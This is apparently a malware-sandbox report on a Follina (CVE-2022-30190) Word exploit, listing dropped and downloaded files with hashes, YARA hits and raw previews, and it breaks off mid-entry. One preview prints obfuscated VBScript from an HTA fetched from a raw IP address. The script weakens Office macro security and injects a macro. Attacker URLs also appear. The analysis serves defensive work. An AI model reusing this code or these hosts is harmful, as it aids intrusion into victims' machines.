                                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):1.3860360556164644
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:OFaV:iu
                                                                                                                                                                            MD5:91E91175EF0AB69EE1660DC75973E103
                                                                                                                                                                            SHA1:80EB1413A74C338E0F857EA75CBA87BFFA7512D0
                                                                                                                                                                            SHA-256:2ACB0CB42BD1E4857BC4A5C1CF20AD3D7969A2E9BA955F313CF6D0A5E0B0FD1B
                                                                                                                                                                            SHA-512:03355BA9D7AB8F32BFFD01F5F6D3133958014701D1B24A6318CBD9038E74DAC97AB10A368B407856E43E5B2A0AEEDECF1B67C1FF74B6AF274E20B8F4A1954249
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:878411. Admin.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):148957
                                                                                                                                                                            Entropy (8bit):5.3567099907271265
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:DcQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3Xx4ETLKz6e:aJQ9DQC+zPXLI
                                                                                                                                                                            MD5:76DD06C4CA5D96F76ED18F76747AE7CB
                                                                                                                                                                            SHA1:48B32707F0C5C47250EA8F7AB076A19FD32395B3
                                                                                                                                                                            SHA-256:AE2B972071E5BB727F017B277CB7BE8AA557CFD0ECF7181BA9AFBA15C371C97D
                                                                                                                                                                            SHA-512:BA16320E4CB34DC5541D63D8E18D193343BFCFDF1C029301692951E46407AE2ECD83F66E29E3B77FA8B889C690A97E4FC671F5FAE4ADF1A55CD100D9AC08B174
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-16T12:19:58">.. Build: 16.0.15414.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5737
                                                                                                                                                                            Entropy (8bit):4.627210073550201
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu
                                                                                                                                                                            MD5:4C00910BAF865F5D0D7F37F77816B375
                                                                                                                                                                            SHA1:ADA759E7A00B362553580A89269201257BD6F9E0
                                                                                                                                                                            SHA-256:32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153
                                                                                                                                                                            SHA-512:9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, Author: Joe Security
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5737
                                                                                                                                                                            Entropy (8bit):4.627210073550201
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu
                                                                                                                                                                            MD5:4C00910BAF865F5D0D7F37F77816B375
                                                                                                                                                                            SHA1:ADA759E7A00B362553580A89269201257BD6F9E0
                                                                                                                                                                            SHA-256:32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153
                                                                                                                                                                            SHA-512:9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, Author: Joe Security
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 581x1278, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):29235
                                                                                                                                                                            Entropy (8bit):7.203733489330109
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:+++r9RfjoOtgBku0d/8wAXLBw75uh62w+ccO+RJPBDJPKQELXu59ghnt8zgmM4CM:++ORjosugKi75u6+vJpDJCBOUK
                                                                                                                                                                            MD5:D7773EE5D4BDFEE97EB233BC5C35C0AA
                                                                                                                                                                            SHA1:51FFFFC7973C3F4EF6B0B153D66293C1CB8195E7
                                                                                                                                                                            SHA-256:F6D0AC498CDE70CFBE4F7DF6B86772BC5CFD43F835D09E0C9570D94801917332
                                                                                                                                                                            SHA-512:9A0843F34E331B103083A8698C97C76CF99EC05BF83266004DF9D55A7596C39F530E1CCF26B9095461A4552F9B146A746C3651A3135D0F6B647A324A122BF04E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.............C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;........E.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(...(...(...(...(...(...(...(...(.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.....i..yy... 9.*..%Z...m.....Y$....j..V.Z...Y....A..)........n.Q..I2..y.........v....j.r]B.....?.Ios..B{i.X.#dW..:...F}...vI.#2pkC.s...n.d.g.3".._...(......r;-J+F.X<FVs(.Tg8.[.j.I.N.d.~..+`.f.p*.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1268x951, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):492596
                                                                                                                                                                            Entropy (8bit):7.89552218174887
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:rA4G7o32/nTnZurIM8gdYjhNSduRYjeqw3C7Nv:Mx7o32/VeZJj5
                                                                                                                                                                            MD5:90BE6B795828441DF1C995671289E431
                                                                                                                                                                            SHA1:7368012CA949A57238DC158C0FEF24A2EFCEB359
                                                                                                                                                                            SHA-256:4A6A787D4BCE57A66828EB9F0F76A6FCAC265A97E6D091AFA150AAD19885C05B
                                                                                                                                                                            SHA-512:9DD8D38314E5C40E68DE3B0C0037EA7C0000F25125C37AC9DB95B5638FB4EEAEB35690F11CC51FD958645D84758698040B0A8CB2BA8A1BF60920B121068AD446
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..O.j.6....2..Bp{....3..}.o..6..........o.....*+y....T.4.M.[...T.q$.^..../.....O....Zj2ya..%.D.....{.X...?u.,...o......P?$O...h..#....Z.....r...^!..... .O...Wx.4..g...c1?.......<:..6.k..}b..R.=>O.5.O.j.#.on.R.Ers..M'.....F..E._.....l....v..$g.|.{.?.+...T.-.@..D.v........}...."..ij.G...d.v6..Kn..3j....7p..@.......PG..^=...[...!..V........!....s..7w.?.?.....%..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1824
                                                                                                                                                                            Entropy (8bit):2.1101189992498828
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:ijs/5M4yZlIbb28RPTtBAwJvbZE9Qf5l6exZEk7Af6BG8Xu2Wg6:2s/5HyZ+bbHNXAwJeUl6eckBBJ+2W
                                                                                                                                                                            MD5:6A8693888432DC8F8094B9F60C6E911B
                                                                                                                                                                            SHA1:04EAB175133D209F6CA37A049CD4E720BC0EE7EF
                                                                                                                                                                            SHA-256:7EB51844A86449D473C83126DDBA1B7231F8B7CA11C5EA56C369748F3C67A2A4
                                                                                                                                                                            SHA-512:7449497106AA59B2C536FAF3596943056D276EE2EEE2CE7DC70FA4CB211A0EA3B857EB205620A561E647D80373527DDCB04A7AA060E70E660E823222E130B7BF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..9hnc..P.UcIc0RKb:g . .1.8.2.7.0.1.7.9.5.0.1.../......./e.N.[~b0RvQ.TW[:N ..s*.z.../.....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . .............................................................................................................................................................................................................................................................................................................................................................................................0...4...6...8...T...H...J...................................................................................................................................................................................................................................................................................................................................................................................................................................................................gd*a
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1024
                                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):21824
                                                                                                                                                                            Entropy (8bit):4.502978783041859
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:fgVwLjUJpJf0t59KLKnVTpngGwK69kVaWXO:YVwLjmpJfC59KLKnVTpngGwK69kVaWXO
                                                                                                                                                                            MD5:3E55BD78BB922420E76EBAF2F5E13BCE
                                                                                                                                                                            SHA1:8E46A458697D4CF862C5B355E0DC4982363E3D15
                                                                                                                                                                            SHA-256:2BC598361C057879174A09C0833EF223225124D6745DF5615A7A1A9C6D273F4C
                                                                                                                                                                            SHA-512:D91869D5BF46C988915B39D5E6F7A34941333AF3B2C385E089B7662635895A6937D9CC0B3AABB8F76E8723A9034674A19B0E07F492E727950E21F0B698EB3632
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta, Author: Arnim Rupp
                                                                                                                                                                            IE Cache URL:http://159.75.135.162:61256/dllhost.hta
                                                                                                                                                                            Preview:<html><head><script language="vbscript">.Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule..Set objExcel = CreateObject("Excel.Application").objExcel.Visible = False..Set WshShell = CreateObject("Wscript.Shell")..function RegExists(regKey)..on error resume next..WshShell.RegRead regKey..RegExists = (Err.number = 0).end function..' Get the old AccessVBOM value.RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & objExcel.Version & "\Excel\Security\AccessVBOM"..if RegExists(RegPath) then..action = WshShell.RegRead(RegPath).else..action = "".end if..' Weaken the target.WshShell.RegWrite RegPath, 1, "REG_DWORD"..' Run the macro.Set objWorkbook = objExcel.Workbooks.Add().Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1).xlmodule.CodeModule.AddFromString "Private "&"Type PRO"&"CESS_INF"&"ORMATION"&Chr(10)&" hPro"&"cess As "&"Long"&Chr(10)&" hThr"&"ead As L"&"ong"&Chr(10)&" dwPr"&"ocessId "&"As Long"&Chr(10)&" dwTh"&"readId A"&"s Long"&Chr(10)& _."End Typ
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):5737
                                                                                                                                                                            Entropy (8bit):4.627210073550201
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu
                                                                                                                                                                            MD5:4C00910BAF865F5D0D7F37F77816B375
                                                                                                                                                                            SHA1:ADA759E7A00B362553580A89269201257BD6F9E0
                                                                                                                                                                            SHA-256:32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153
                                                                                                                                                                            SHA-512:9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, Author: Joe Security
                                                                                                                                                                            IE Cache URL:http://101.33.231.81:62563/exploit.html
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.120422056924814
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:H54C9A+gqyIiDKzhHaAhKqmxfII+ycuZhN+akSGPNnq9Wd:ZCffK96iKqmxg1ul+a36q9m
                                                                                                                                                                            MD5:CBC4FD42283484CF2D3661E516B43451
                                                                                                                                                                            SHA1:B2E7228A493A798BB45DDF1F44ACC49C5C0337CB
                                                                                                                                                                            SHA-256:12090443E2B39FCA7099B35FA2E4FB8AFA00B4FFAD3AF0D6B011407C4C51006E
                                                                                                                                                                            SHA-512:C02E05CE6AEE4FD0F61B69B93EFF18474037A3CB399989A4A5851234E273794BE2499C02CA063BC03B206B56700F2A32D1C72EB6481BC07ED027C279961F8A4C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP.................!...U..... ............4.......C:\Users\user\AppData\Local\Temp\RES55EE.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.p.p.v.b.w.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.084699669422432
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:HyC9AWPbdOH0hhKqmxfWI+ycuZhNhakSvPNnq9Wd:wWPb8UvKqmx+1ulha3tq9m
                                                                                                                                                                            MD5:BB0053D5F736B89AFBB8F5F33B5E7218
                                                                                                                                                                            SHA1:BC0356C8CC0EE3D0F6575BCDA49C84B500A886BA
                                                                                                                                                                            SHA-256:0027B8C1EC66C5E0F3180DDAD2A9D7A7BE8E9EA7EFE0E4743336056392588744
                                                                                                                                                                            SHA-512:B392A188FC74745AB54711044818159103D21BDC63774D5A34F19F1C68FEAB6F368DA3F298D7BCDACA8B211ABB50C59001CE331341BB2C15179BF553E49A4DF9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L.....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP.................K..U5Sh..r..P...........3.......C:\Users\user\AppData\Local\Temp\RES5BB.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.y.s.l.w.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.08674734556556
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:H/C9AWP2q/quhHahKqmxfII+ycuZhNtakS7PNnq9Wd:PWPlQKqmxg1ulta3xq9m
                                                                                                                                                                            MD5:E5AB62FAA5D8C8A3F961D1CFF28FCF95
                                                                                                                                                                            SHA1:E9E46C7366678D5C85E4C2876799BA5CB846A997
                                                                                                                                                                            SHA-256:9DBE47EB4DA49C11B8BDF462D9FEFAD81A22164B6FD110800217598AD5F9A9F0
                                                                                                                                                                            SHA-512:2D6941FE9DE5E2C4E7D22136A0F5C17FAB3BC8B3930C0F7D37145B6026C9BE6F985F952AA475AB20D576CB788537EA9F63FA954B751F5E4F987C2C03E282B629
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP.......................5z.u^..[...........4.......C:\Users\user\AppData\Local\Temp\RES5C8A.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.0.i.d.a.0.b.j...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.090964277542768
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzak7YnqqvPN5Dlq5J:+RI+ycuZhNhakSvPNnqX
                                                                                                                                                                            MD5:DA4BFE7F55355368C79EE672A4185098
                                                                                                                                                                            SHA1:5B75DE9971EC4A6E63E519B9D5044EAC3BA7FB47
                                                                                                                                                                            SHA-256:F9BB363D2704FDF15A83424F1EF06EE22853A2755B8702E36972D67BBB4AD7C4
                                                                                                                                                                            SHA-512:B0997552C916A28AE3AE25332D50EBA9A342AA0C6E7F765694515EE6B7BA59C3A5C3C9FCB479800BB897428F9D224EAE4AD575F4AA0879B8CBAAF11C4161C317
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.y.s.l.w.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.f.y.s.l.w.g.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                            Entropy (8bit):3.0912843516559185
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:etGSr9pz1qlkCe745Q7GslPor9LjvX5ekjV4gztkZfDdy6Iv+/OBWI+ycuZhNhaU:6vpqb927GslPELDRjyJDdQk1ulha3tq
                                                                                                                                                                            MD5:B651714635F6DA8C2823B9E0E06BEB86
                                                                                                                                                                            SHA1:1172AE739291891D8B11CED2EECF16EC2A37F006
